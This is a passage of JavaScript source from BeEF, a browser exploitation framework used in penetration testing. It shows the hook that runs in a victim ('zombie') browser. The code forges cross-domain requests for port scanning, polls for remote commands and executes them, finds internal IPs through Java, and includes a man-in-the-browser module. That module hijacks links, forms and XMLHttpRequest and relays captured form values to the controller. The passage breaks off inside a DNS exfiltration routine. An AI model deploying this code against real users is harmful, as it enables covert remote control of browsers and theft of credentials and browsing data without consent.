7226 response.was_timedout = false;
7227 response.duration = (end_time - start_time);
7228 },
7229 error: function (jqXHR, textStatus, errorThrown) {
7230 var end_time = new Date().getTime();
7231 response.response_body = jqXHR.responseText;
7232 response.status_code = jqXHR.status;
7233 response.status_text = textStatus;
7234 response.duration = (end_time - start_time);
7235 response.port_status = "open";
7236 },
7237 complete: function (jqXHR, textStatus) {
7238 response.status_code = jqXHR.status;
7239 response.status_text = textStatus;
7240 response.headers = jqXHR.getAllResponseHeaders();
7241 // determine if TCP port is open/closed/not-http
7242 if (textStatus == "timeout") {
7243 response.was_timedout = true;
7244 response.response_body = "ERROR: Timed out\n";
7245 response.port_status = "closed";
7246 } else if (textStatus == "parsererror") {
7247 response.port_status = "not-http";
7248 } else {
7249 response.port_status = "open";
7250 }
7251 }
7252 }).always(function () {
7253 if (callback != null) {
7254 callback(response);
7255 }
7256 });
7257 return response;
7258 },
7259
7260 /*
7261 * Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
7262 * - requestid: needed on the callback
7263 * - allowCrossDomain: set cross-domain requests as allowed or blocked
7264 *
7265 * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
7266 * Example usage:
7267 * beef.net.forge_request("http", "POST", "172.20.40.50", 8080, "/lulz",
7268 * true, null, { foo: "bar" }, 5, 'html', false, null, function(response) {
7269 * alert(response.response_body)})
7270 */
7271 forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
7272
7273 // check if same domain or cross domain
7274 var cross_domain = true;
7275 if (domain == "undefined" || path == "undefined") {
7276 return;
7277 }
7278 if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
7279 if (document.location.port == "" || document.location.port == null) {
7280 cross_domain = !(port == "80" || port == "443");
7281 } else {
7282 if (document.location.port == port) cross_domain = false;
7283 }
7284 }
7285 // build the url
7286 var url = "";
7287 if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
7288 url = path;
7289 } else {
7290 url = scheme + "://" + domain;
7291 url = (port != null) ? url + ":" + port : url;
7292 url = (path != null) ? url + path : url;
7293 url = (anchor != null) ? url + "#" + anchor : url;
7294 }
7295
7296 // define response object
7297 var response = new this.response;
7298 response.was_cross_domain = cross_domain;
7299 var start_time = new Date().getTime();
7300
7301 // if cross-domain requests are not allowed and the request is cross-domain
7302 // don't proceed and return
7303 if (allowCrossDomain == "false" && cross_domain && callback != null) {
7304 response.status_code = -1;
7305 response.status_text = "crossdomain";
7306 response.port_status = "crossdomain";
7307 response.response_body = "ERROR: Cross Domain Request. The request was not sent.\n";
7308 response.headers = "ERROR: Cross Domain Request. The request was not sent.\n";
7309 callback(response, requestid);
7310 return response;
7311 }
7312
7313 /*
7314 * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
7315 * This will turn POSTs into GETs for remote-domain requests.
7316 */
7317 if (method == "POST") {
7318 $j.ajaxSetup({
7319 dataType: dataType
7320 });
7321 } else {
7322 $j.ajaxSetup({
7323 dataType: 'script'
7324 });
7325 }
7326
7327 // this is required for bugs in IE so data can be transferred back to the server
7328 if (beef.browser.isIE()) {
7329 dataType = 'script'
7330 }
7331
7332 $j.ajax({type: method,
7333 dataType: dataType,
7334 url: url,
7335 headers: headers,
7336 timeout: (timeout * 1000),
7337
7338 //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
7339 beforeSend: function (xhr) {
7340 if (method == "POST") {
7341 xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
7342 }
7343 },
7344
7345 data: data,
7346
7347 // http server responded successfully
7348 success: function (data, textStatus, xhr) {
7349 var end_time = new Date().getTime();
7350 response.status_code = xhr.status;
7351 response.status_text = textStatus;
7352 response.response_body = data;
7353 response.was_timedout = false;
7354 response.duration = (end_time - start_time);
7355 },
7356
7357 // server responded with a http error (403, 404, 500, etc)
7358 // or server is not a http server
7359 error: function (xhr, textStatus, errorThrown) {
7360 var end_time = new Date().getTime();
7361 response.response_body = xhr.responseText;
7362 response.status_code = xhr.status;
7363 response.status_text = textStatus;
7364 response.duration = (end_time - start_time);
7365 },
7366
7367 complete: function (xhr, textStatus) {
7368 // cross-domain request
7369 if (cross_domain) {
7370
7371 response.port_status = "crossdomain";
7372
7373 if (xhr.status != 0) {
7374 response.status_code = xhr.status;
7375 } else {
7376 response.status_code = -1;
7377 }
7378
7379 if (textStatus) {
7380 response.status_text = textStatus;
7381 } else {
7382 response.status_text = "crossdomain";
7383 }
7384
7385 if (xhr.getAllResponseHeaders()) {
7386 response.headers = xhr.getAllResponseHeaders();
7387 } else {
7388 response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
7389 }
7390
7391 if (!response.response_body) {
7392 response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
7393 }
7394
7395 } else {
7396 // same-domain request
7397 response.status_code = xhr.status;
7398 response.status_text = textStatus;
7399 response.headers = xhr.getAllResponseHeaders();
7400
7401 // determine if TCP port is open/closed/not-http
7402 if (textStatus == "timeout") {
7403 response.was_timedout = true;
7404 response.response_body = "ERROR: Timed out\n";
7405 response.port_status = "closed";
7406 /*
7407 * With IE we need to explicitly set the dataType to "script",
7408 * so there will be always parse-errors if the content is != javascript
7409 * */
7410 } else if (textStatus == "parsererror") {
7411 response.port_status = "not-http";
7412 if (beef.browser.isIE()) {
7413 response.status_text = "success";
7414 response.port_status = "open";
7415 }
7416 } else {
7417 response.port_status = "open";
7418 }
7419 }
7420 callback(response, requestid);
7421 }
7422 });
7423 return response;
7424 },
7425
7426 //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
7427 //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
7428 clean: function (r) {
7429 if (this.array_has_string_key(r)) {
7430 var obj = {};
7431 for (var key in r)
7432 obj[key] = (this.array_has_string_key(obj[key])) ? this.clean(r[key]) : r[key];
7433 return obj;
7434 }
7435 return r;
7436 },
7437
7438 //Detects if an array has a string key
7439 array_has_string_key: function (arr) {
7440 if ($j.isArray(arr)) {
7441 try {
7442 for (var key in arr)
7443 if (isNaN(parseInt(key))) return true;
7444 } catch (e) {
7445 }
7446 }
7447 return false;
7448 },
7449
7450 /**
7451 * Sends back browser details to framework, calling beef.browser.getDetails()
7452 */
7453 browser_details: function () {
7454 var details = beef.browser.getDetails();
7455 details['HookSessionID'] = beef.session.get_hook_session_id();
7456 this.send('/init', 0, details);
7457 }
7458
7459};
7460
7461
7462beef.regCmp('beef.net');
7463
7464
7465//
7466// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
7467// Browser Exploitation Framework (BeEF) - http://beefproject.com
7468// See the file 'doc/COPYING' for copying permission
7469//
7470
7471/*!
7472 * @Literal object: beef.updater
7473 *
7474 * Object in charge of getting new commands from the BeEF framework and execute them.
7475 * The XHR-polling channel is managed here. If WebSockets are enabled,
7476 * websocket.ls is used instead.
7477 */
7478beef.updater = {
7479
7480 // XHR-polling timeout.
7481 xhr_poll_timeout: "1000",
7482 beefhook: "BEEFHOOK",
7483
7484 // A lock.
7485 lock: false,
7486
7487 // An object containing all values to be registered and sent by the updater.
7488 objects: new Object(),
7489
7490 /*
7491 * Registers an object to always send when requesting new commands to the framework.
7492 * @param: {String} the name of the object.
7493 * @param: {String} the value of that object.
7494 *
7495 * @example: beef.updater.regObject('java_enabled', 'true');
7496 */
7497 regObject: function(key, value) {
7498 this.objects[key] = escape(value);
7499 },
7500
7501 // Checks for new commands from the framework and runs them.
7502 check: function() {
7503 if(this.lock == false) {
7504 if (beef.logger.running) {
7505 beef.logger.queue();
7506 }
7507 beef.net.flush();
7508 if(beef.commands.length > 0) {
7509 this.execute_commands();
7510 }else {
7511 this.get_commands(); /*Polling*/
7512 }
7513 }
7514 /* The following gives a stupid syntax error in IE, which can be ignored*/
7515 setTimeout(function(){beef.updater.check()}, beef.updater.xhr_poll_timeout);
7516 },
7517
7518 /**
7519 * Gets new commands from the framework.
7520 */
7521 get_commands: function() {
7522 try {
7523 this.lock = true;
7524 beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
7525 if (response.body != null && response.body.length > 0)
7526 beef.updater.execute_commands();
7527 });
7528 } catch(e) {
7529 this.lock = false;
7530 return;
7531 }
7532 this.lock = false;
7533 },
7534
7535 /**
7536 * Executes the received commands, if any.
7537 */
7538 execute_commands: function() {
7539 if(beef.commands.length == 0) return;
7540 this.lock = true;
7541 while(beef.commands.length > 0) {
7542 command = beef.commands.pop();
7543 try {
7544 command();
7545 } catch(e) {
7546 beef.debug('execute_commands - command failed to execute: ' + e.message);
7547 // prints the command source to be executed, to better trace errors
7548 // beef.client_debug must be enabled in the main config
7549 beef.debug(command.toString());
7550 }
7551 }
7552 this.lock = false;
7553 }
7554};
7555
7556beef.regCmp('beef.updater');
7557
7558
7559//
7560// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
7561// Browser Exploitation Framework (BeEF) - http://beefproject.com
7562// See the file 'doc/COPYING' for copying permission
7563//
7564
7565// Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
7566
7567beef.encode = {};
7568
7569beef.encode.base64 = {
7570
7571 keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
7572
7573 encode : function (input) {
7574 if (window.btoa) {
7575 return btoa(unescape(encodeURIComponent(input)));
7576 }
7577
7578 var output = "";
7579 var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
7580 var i = 0;
7581
7582 input = beef.encode.base64.utf8_encode(input);
7583
7584 while (i < input.length) {
7585
7586 chr1 = input.charCodeAt(i++);
7587 chr2 = input.charCodeAt(i++);
7588 chr3 = input.charCodeAt(i++);
7589
7590 enc1 = chr1 >> 2;
7591 enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
7592 enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
7593 enc4 = chr3 & 63;
7594
7595 if (isNaN(chr2)) {
7596 enc3 = enc4 = 64;
7597 } else if (isNaN(chr3)) {
7598 enc4 = 64;
7599 }
7600
7601 output = output +
7602 this.keyStr.charAt(enc1) + this.keyStr.charAt(enc2) +
7603 this.keyStr.charAt(enc3) + this.keyStr.charAt(enc4);
7604
7605 }
7606
7607 return output;
7608 },
7609
7610
7611 decode : function (input) {
7612 if (window.atob) {
7613 return escape(atob(input));
7614 }
7615
7616 var output = "";
7617 var chr1, chr2, chr3;
7618 var enc1, enc2, enc3, enc4;
7619 var i = 0;
7620
7621 input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
7622
7623 while (i < input.length) {
7624
7625 enc1 = this.keyStr.indexOf(input.charAt(i++));
7626 enc2 = this.keyStr.indexOf(input.charAt(i++));
7627 enc3 = this.keyStr.indexOf(input.charAt(i++));
7628 enc4 = this.keyStr.indexOf(input.charAt(i++));
7629
7630 chr1 = (enc1 << 2) | (enc2 >> 4);
7631 chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
7632 chr3 = ((enc3 & 3) << 6) | enc4;
7633
7634 output = output + String.fromCharCode(chr1);
7635
7636 if (enc3 != 64) {
7637 output = output + String.fromCharCode(chr2);
7638 }
7639 if (enc4 != 64) {
7640 output = output + String.fromCharCode(chr3);
7641 }
7642
7643 }
7644
7645 output = beef.encode.base64.utf8_decode(output);
7646
7647 return output;
7648
7649 },
7650
7651
7652 utf8_encode : function (string) {
7653 string = string.replace(/\r\n/g,"\n");
7654 var utftext = "";
7655
7656 for (var n = 0; n < string.length; n++) {
7657
7658 var c = string.charCodeAt(n);
7659
7660 if (c < 128) {
7661 utftext += String.fromCharCode(c);
7662 }
7663 else if((c > 127) && (c < 2048)) {
7664 utftext += String.fromCharCode((c >> 6) | 192);
7665 utftext += String.fromCharCode((c & 63) | 128);
7666 }
7667 else {
7668 utftext += String.fromCharCode((c >> 12) | 224);
7669 utftext += String.fromCharCode(((c >> 6) & 63) | 128);
7670 utftext += String.fromCharCode((c & 63) | 128);
7671 }
7672
7673 }
7674
7675 return utftext;
7676 },
7677
7678 utf8_decode : function (utftext) {
7679 var string = "";
7680 var i = 0;
7681 var c = c1 = c2 = 0;
7682
7683 while ( i < utftext.length ) {
7684
7685 c = utftext.charCodeAt(i);
7686
7687 if (c < 128) {
7688 string += String.fromCharCode(c);
7689 i++;
7690 }
7691 else if((c > 191) && (c < 224)) {
7692 c2 = utftext.charCodeAt(i+1);
7693 string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
7694 i += 2;
7695 }
7696 else {
7697 c2 = utftext.charCodeAt(i+1);
7698 c3 = utftext.charCodeAt(i+2);
7699 string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
7700 i += 3;
7701 }
7702
7703 }
7704
7705 return string;
7706 }
7707
7708};
7709
7710beef.regCmp('beef.encode.base64');
7711
7712
7713//
7714// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
7715// Browser Exploitation Framework (BeEF) - http://beefproject.com
7716// See the file 'doc/COPYING' for copying permission
7717//
7718
7719// Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
7720
7721beef.encode.json = {
7722
7723 stringify: function(o) {
7724 if (typeof(JSON) == 'object' && JSON.stringify) {
7725 // Error on stringifying cylcic structures caused polling to die
7726 try {
7727 s = JSON.stringify(o);
7728 } catch(error) {
7729 // TODO log error / handle cyclic structures?
7730 }
7731 return s;
7732 }
7733 var type = typeof(o);
7734
7735 if (o === null)
7736 return "null";
7737
7738 if (type == "undefined")
7739 return '\"\"';
7740
7741 if (type == "number" || type == "boolean")
7742 return o + "";
7743
7744 if (type == "string")
7745 return $j.quoteString(o);
7746
7747 if (type == 'object')
7748 {
7749 if (typeof o.toJSON == "function")
7750 return $j.toJSON( o.toJSON() );
7751
7752 if (o.constructor === Date)
7753 {
7754 var month = o.getUTCMonth() + 1;
7755 if (month < 10) month = '0' + month;
7756
7757 var day = o.getUTCDate();
7758 if (day < 10) day = '0' + day;
7759
7760 var year = o.getUTCFullYear();
7761
7762 var hours = o.getUTCHours();
7763 if (hours < 10) hours = '0' + hours;
7764
7765 var minutes = o.getUTCMinutes();
7766 if (minutes < 10) minutes = '0' + minutes;
7767
7768 var seconds = o.getUTCSeconds();
7769 if (seconds < 10) seconds = '0' + seconds;
7770
7771 var milli = o.getUTCMilliseconds();
7772 if (milli < 100) milli = '0' + milli;
7773 if (milli < 10) milli = '0' + milli;
7774
7775 return '"' + year + '-' + month + '-' + day + 'T' +
7776 hours + ':' + minutes + ':' + seconds +
7777 '.' + milli + 'Z"';
7778 }
7779
7780 if (o.constructor === Array)
7781 {
7782 var ret = [];
7783 for (var i = 0; i < o.length; i++)
7784 ret.push( $j.toJSON(o[i]) || "null" );
7785
7786 return "[" + ret.join(",") + "]";
7787 }
7788
7789 var pairs = [];
7790 for (var k in o) {
7791 var name;
7792 var type = typeof k;
7793
7794 if (type == "number")
7795 name = '"' + k + '"';
7796 else if (type == "string")
7797 name = $j.quoteString(k);
7798 else
7799 continue; //skip non-string or number keys
7800
7801 if (typeof o[k] == "function")
7802 continue; //skip pairs where the value is a function.
7803
7804 var val = $j.toJSON(o[k]);
7805
7806 pairs.push(name + ":" + val);
7807 }
7808
7809 return "{" + pairs.join(", ") + "}";
7810 }
7811 },
7812
7813 quoteString: function(string) {
7814 if (string.match(this._escapeable))
7815 {
7816 return '"' + string.replace(this._escapeable, function (a)
7817 {
7818 var c = this._meta[a];
7819 if (typeof c === 'string') return c;
7820 c = a.charCodeAt();
7821 return '\\u00' + Math.floor(c / 16).toString(16) + (c % 16).toString(16);
7822 }) + '"';
7823 }
7824 return '"' + string + '"';
7825 },
7826
7827 _escapeable: /["\\\x00-\x1f\x7f-\x9f]/g,
7828
7829 _meta : {
7830 '\b': '\\b',
7831 '\t': '\\t',
7832 '\n': '\\n',
7833 '\f': '\\f',
7834 '\r': '\\r',
7835 '"' : '\\"',
7836 '\\': '\\\\'
7837 }
7838};
7839
7840$j.toJSON = function(o) {return beef.encode.json.stringify(o);};
7841$j.quoteString = function(o) {return beef.encode.json.quoteString(o);};
7842
7843beef.regCmp('beef.encode.json');
7844
7845
7846//
7847// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
7848// Browser Exploitation Framework (BeEF) - http://beefproject.com
7849// See the file 'doc/COPYING' for copying permission
7850//
7851
7852/*!
7853 * @literal object: beef.net.local
7854 *
7855 * Provides networking functions for the local/internal network of the zombie.
7856 */
7857beef.net.local = {
7858
7859 sock: false,
7860 checkJava: false,
7861 hasJava: false,
7862
7863 /**
7864 * Initializes the java socket. We have to use this method because
7865 * some browsers do not have java installed or it is not accessible.
7866 * in which case creating a socket directly generates an error. So this code
7867 * is invalid:
7868 * sock: new java.net.Socket();
7869 */
7870
7871 initializeSocket: function() {
7872 if(this.checkJava){
7873 if(!beef.browser.hasJava()) {
7874 this.checkJava=True;
7875 this.hasJava=False;
7876 return -1;
7877 }else{
7878 this.checkJava=True;
7879 this.hasJava=True;
7880 return 1;
7881 }
7882 }
7883 else{
7884 if(!this.hasJava) return -1;
7885 else{
7886 try {
7887 this.sock = new java.net.Socket();
7888 } catch(e) {
7889 return -1;
7890 }
7891 return 1;
7892 }
7893 }
7894 },
7895
7896 /**
7897 * Returns the internal IP address of the zombie.
7898 * @return: {String} the internal ip of the zombie.
7899 * @error: return -1 if the internal ip cannot be retrieved.
7900 */
7901 getLocalAddress: function() {
7902 if(!this.hasJava) return false;
7903
7904 this.initializeSocket();
7905
7906 try {
7907 this.sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
7908 this.sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
7909
7910 return this.sock.getLocalAddress().getHostAddress();
7911 } catch(e) { return false; }
7912 },
7913
7914 /**
7915 * Returns the internal hostname of the zombie.
7916 * @return: {String} the internal hostname of the zombie.
7917 * @error: return -1 if the hostname cannot be retrieved.
7918 */
7919 getLocalHostname: function() {
7920 if(!this.hasJava) return false;
7921
7922 this.initializeSocket();
7923
7924 try {
7925 this.sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
7926 this.sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
7927
7928 return this.sock.getLocalAddress().getHostName();
7929 } catch(e) { return false; }
7930 }
7931
7932};
7933
7934beef.regCmp('beef.net.local');
7935
7936
7937//
7938// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
7939// Browser Exploitation Framework (BeEF) - http://beefproject.com
7940// See the file 'doc/COPYING' for copying permission
7941//
7942
7943/**
7944 * @literal object: beef.init
7945 * Contains the beef_init() method which starts the BeEF client-side
7946 * logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
7947 *
7948 * If beef.pageIsLoaded is true, then this JS has been loaded >1 times
7949 * and will have a new session id. The new session id will need to know
7950 * the brwoser details. So sendback the browser details again.
7951 */
7952
7953beef.session.get_hook_session_id();
7954
7955if (beef.pageIsLoaded) {
7956 beef.net.browser_details();
7957}
7958
7959window.onload = function () {
7960 beef_init();
7961};
7962
7963window.onpopstate = function (event) {
7964 if (beef.onpopstate.length > 0) {
7965 event.preventDefault;
7966 for (var i = 0; i < beef.onpopstate.length; i++) {
7967 var callback = beef.onpopstate[i];
7968 try {
7969 callback(event);
7970 } catch (e) {
7971 beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
7972 }
7973 return false;
7974 }
7975 }
7976};
7977
7978window.onclose = function (event) {
7979 if (beef.onclose.length > 0) {
7980 event.preventDefault;
7981 for (var i = 0; i < beef.onclose.length; i++) {
7982 var callback = beef.onclose[i];
7983 try {
7984 callback(event);
7985 } catch (e) {
7986 beef.debug("window.onclose - couldn't execute callback: " + e.message);
7987 }
7988 return false;
7989 }
7990 }
7991};
7992
7993/**
7994 * Starts the polling mechanism, and initialize various components:
7995 * - browser details (see browser.js) are sent back to the "/init" handler
7996 * - the polling starts (checks for new commands, and execute them)
7997 * - the logger component is initialized (see logger.js)
7998 * - the Autorun Engine is initialized (see are.js)
7999 */
8000function beef_init() {
8001 if (!beef.pageIsLoaded) {
8002 beef.pageIsLoaded = true;
8003 if (beef.browser.hasWebSocket() && typeof beef.websocket != 'undefined') {
8004 beef.websocket.start();
8005 beef.net.browser_details();
8006 beef.updater.execute_commands();
8007 beef.logger.start();
8008 }else {
8009 beef.net.browser_details();
8010 beef.updater.execute_commands();
8011 beef.updater.check();
8012 beef.logger.start();
8013 }
8014 }
8015}
8016
8017
8018//
8019// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
8020// Browser Exploitation Framework (BeEF) - http://beefproject.com
8021// See the file 'doc/COPYING' for copying permission
8022//
8023
8024
8025beef.mitb = {
8026
8027 cid:null,
8028 curl:null,
8029
8030 init:function (cid, curl) {
8031 beef.mitb.cid = cid;
8032 beef.mitb.curl = curl;
8033 /*Override open method to intercept ajax request*/
8034 var hook_file = "/hook.js";
8035
8036 if (window.XMLHttpRequest && !(window.ActiveXObject)) {
8037
8038 beef.mitb.sniff("Method XMLHttpRequest.open override");
8039 (function (open) {
8040 XMLHttpRequest.prototype.open = function (method, url, async, mitb_call) {
8041 // Ignore it and don't hijack it. It's either a request to BeEF (hook file or Dynamic Handler)
8042 // or a request initiated by the MiTB itself.
8043 if (mitb_call || (url.indexOf(hook_file) != -1 || url.indexOf("/dh?") != -1)) {
8044 open.call(this, method, url, async, true);
8045 }else {
8046 var portRegex = new RegExp(":[0-9]+");
8047 var portR = portRegex.exec(url);
8048 var requestPort;
8049 if (portR != null) { requestPort = portR[0].split(":")[1]; }
8050
8051 //GET request
8052 if (method == "GET") {
8053 //GET request -> cross-origin
8054 if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
8055 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
8056 window.open(url);
8057 }else { //GET request -> same-origin
8058 beef.mitb.sniff("GET [Ajax Request]: " + url);
8059 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
8060 var title = "";
8061 if (document.getElementsByTagName("title").length == 0) {
8062 title = document.title;
8063 } else {
8064 title = document.getElementsByTagName("title")[0].innerHTML;
8065 }
8066 // write the url of the page
8067 history.pushState({ Be:"EF" }, title, url);
8068 }
8069 }
8070 }else{
8071 //POST request
8072 beef.mitb.sniff("POST ajax request to: " + url);
8073 open.call(this, method, url, async, true);
8074 }
8075 }
8076 };
8077 })(XMLHttpRequest.prototype.open);
8078 }
8079 },
8080
8081 // Initializes the hook on anchors and forms.
8082 hook:function () {
8083 beef.onpopstate.push(function (event) {
8084 beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
8085 });
8086 beef.onclose.push(function (event) {
8087 beef.mitb.endSession();
8088 });
8089
8090 var anchors = document.getElementsByTagName("a");
8091 var forms = document.getElementsByTagName("form");
8092 var lis = document.getElementsByTagName("li");
8093
8094 for (var i = 0; i < anchors.length; i++) {
8095 anchors[i].onclick = beef.mitb.poisonAnchor;
8096 }
8097 for (var i = 0; i < forms.length; i++) {
8098 beef.mitb.poisonForm(forms[i]);
8099 }
8100
8101 for (var i = 0; i < lis.length; i++) {
8102 if (lis[i].hasAttribute("onclick")) {
8103 lis[i].removeAttribute("onclick");
8104 /*clear*/
8105 lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
8106 /*override*/
8107
8108 }
8109 }
8110 },
8111
8112 // Hooks anchors and prevents them from linking away
8113 poisonAnchor:function (e) {
8114 try {
8115 e.preventDefault;
8116 if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
8117 var title = "";
8118 if (document.getElementsByTagName("title").length == 0) {
8119 title = document.title;
8120 } else {
8121 title = document.getElementsByTagName("title")[0].innerHTML;
8122 }
8123 history.pushState({ Be:"EF" }, title, e.currentTarget);
8124 }
8125 } catch (e) {
8126 beef.debug('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
8127 }
8128 return false;
8129 },
8130
8131 // Hooks forms and prevents them from linking away
8132 poisonForm:function (form) {
8133 form.onsubmit = function (e) {
8134 var inputs = form.getElementsByTagName("input");
8135 var query = "";
8136 for (var i = 0; i < inputs.length; i++) {
8137 if (i > 0 && i < inputs.length - 1) query += "&";
8138 switch (inputs[i].type) {
8139 case "submit":
8140 break;
8141 default:
8142 query += inputs[i].name + "=" + inputs[i].value;
8143 break;
8144 }
8145 }
8146 e.preventdefault;
8147 beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
8148 history.pushState({ Be:"EF" }, "", form.action);
8149 return false;
8150 }
8151 },
8152
8153 // Fetches a hooked form with AJAX
8154 fetchForm:function (url, query, target) {
8155 try {
8156 var y = new XMLHttpRequest();
8157 y.open('POST', url, false, true);
8158 y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
8159 y.onreadystatechange = function () {
8160 if (y.readyState == 4 && y.responseText != "") {
8161 target.innerHTML = y.responseText;
8162 setTimeout(beef.mitb.hook, 10);
8163 }
8164 };
8165 y.send(query);
8166 beef.mitb.sniff("POST: " + url + "[" + query + "]");
8167 return true;
8168 } catch (x) {
8169 return false;
8170 }
8171 },
8172
8173 // Fetches a hooked link with AJAX
8174 fetch:function (url, target) {
8175 try {
8176 var y = new XMLHttpRequest();
8177 y.open('GET', url, false, true);
8178 y.onreadystatechange = function () {
8179 if (y.readyState == 4 && y.responseText != "") {
8180 target.innerHTML = y.responseText;
8181 setTimeout(beef.mitb.hook, 10);
8182 }
8183 };
8184 y.send(null);
8185 beef.mitb.sniff("GET: " + url);
8186 return true;
8187 } catch (x) {
8188 window.open(url);
8189 beef.mitb.sniff("GET [New Window]: " + url);
8190 return false;
8191 }
8192 },
8193
8194 // Fetches a window.location=http://domainname.com and setting up history
8195 fetchOnclick:function (url) {
8196 try {
8197 var target = document.getElementsByTagName("html")[0];
8198 var y = new XMLHttpRequest();
8199 y.open('GET', url, false, true);
8200 y.onreadystatechange = function () {
8201 if (y.readyState == 4 && y.responseText != "") {
8202 var title = "";
8203 if (document.getElementsByTagName("title").length == 0) {
8204 title = document.title;
8205 }
8206 else {
8207 title = document.getElementsByTagName("title")[0].innerHTML;
8208 }
8209 history.pushState({ Be:"EF" }, title, url);
8210 target.innerHTML = y.responseText;
8211 setTimeout(beef.mitb.hook, 10);
8212 }
8213 };
8214 y.send(null);
8215 beef.mitb.sniff("GET: " + url);
8216
8217 } catch (x) {
8218 // the link is cross-origin, so load the resource in a different tab
8219 window.open(url);
8220 beef.mitb.sniff("GET [New Window]: " + url);
8221 }
8222 },
8223
8224 // Relays an entry to the framework
8225 sniff:function (result) {
8226 try {
8227 beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
8228 } catch (x) {
8229 }
8230 return true;
8231 },
8232
8233 // Signals the Framework that the user has lost the hook
8234 endSession:function () {
8235 beef.mitb.sniff("Window closed.");
8236 }
8237};
8238
8239beef.regCmp('beef.mitb');
8240
8241
8242//
8243// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
8244// Browser Exploitation Framework (BeEF) - http://beefproject.com
8245// See the file 'doc/COPYING' for copying permission
8246//
8247
8248/*!
8249 * @literal object: beef.net.dns
8250 *
8251 * request object structure:
8252 * + msgId: {Integer} Unique message ID for the request.
8253 * + domain: {String} Remote domain to retrieve the data.
8254 * + wait: {Integer} Wait time between requests (milliseconds) - NOT IMPLEMENTED
8255 * + callback: {Function} Callback function to receive the number of requests sent.
8256 */
8257
8258beef.net.dns = {
8259
8260 handler: "dns",
8261
8262 send: function(msgId, data, domain, callback) {
8263
8264 var encode_data = function(str) {
8265 var result="";
8266 for(i=0;i<str.length;++i) {
8267 result+=str.charCodeAt(i).toString(16).toUpperCase();
8268 }
8269 return result;
8270 };
8271
8272 var encodedData = encodeURI(encode_data(data));
8273
8274 beef.debug(encodedData);
8275 beef.debug("_encodedData_ length: " + encodedData.length);
8276
8277 // limitations to DNS according to RFC 1035:
8278 // o Domain names must only consist of a-z, A-Z, 0-9, hyphen (-) and fullstop (.) characters
8279 // o Domain names are limited to 255 characters in length (including dots)
8280 // o The name space has a maximum depth of 127 levels (ie, maximum 127 subdomains)
8281 // o Subdomains are limited to 63 characters in length (including the trailing dot)
8282
8283 // DNS request structure:
8284 // COMMAND_ID.SEQ_NUM.SEQ_TOT.DATA.DOMAIN
8285 //max_length: 3. 3 . 3 . 63 . x
8286
8287 // only max_data_segment_length is currently used to split data into chunks. and only 1 chunk is used per request.
8288 // for optimal performance, use the following vars and use the whole available space (which needs changes server-side too)
8289 var reserved_seq_length = 3 + 3 + 3 + 3; // consider also 3 dots
8290 var max_domain_length = 255 - reserved_seq_length; //leave some space for sequence numbers
8291 var max_data_segment_length = 63; // by RFC
8292
8293 beef.debug("max_data_segment_length: " + max_data_segment_length);
8294
8295 var dom = document.createElement('b');
8296
8297 String.prototype.chunk = function(n) {
8298 if (typeof n=='undefined') n=100;
8299 return this.match(RegExp('.{1,'+n+'}','g'));
8300 };
8301
8302 var sendQuery = function(query) {
8303 var img = new Image;
8304 //img.src = "http://"+query;
8305 img.src = beef.net.httpproto + "://" + query; // prevents issues with mixed content
8306 img.onload = function() { dom.removeChild(this); }
8307 img.onerror = function() { dom.removeChild(this); }
8308 dom.appendChild(img);
8309
8310 //experimental
8311 //setTimeout(function(){dom.removeChild(img)},1000);
8312 };
8313
8314 var segments = encodedData.chunk(max_data_segment_length);
8315
